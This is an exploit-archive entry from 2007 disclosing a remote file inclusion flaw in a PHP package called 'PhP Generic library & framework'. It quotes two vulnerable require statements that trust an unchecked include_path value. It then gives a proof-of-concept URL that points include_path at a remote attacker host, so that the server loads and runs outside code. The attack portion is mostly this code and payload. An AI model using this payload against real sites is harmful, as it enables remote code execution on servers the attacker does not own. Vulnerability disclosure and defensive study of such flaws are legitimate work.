PhP Generic library & framework (include_path) RFI Vulnerability

2007-01-28T00:00:00
ID 1337DAY-ID-1440
Type zdt
Reporter xoron
Modified 2007-01-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
PhP Generic library & framework (include_path) RFI Vulnerability
================================================================



-----------------------------------------------

PhP Generic library & framework (include_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:

require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";

-----------------------------------------------

POC:

www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?


-----------------------------------------------




#  0day.today [2018-04-09]  #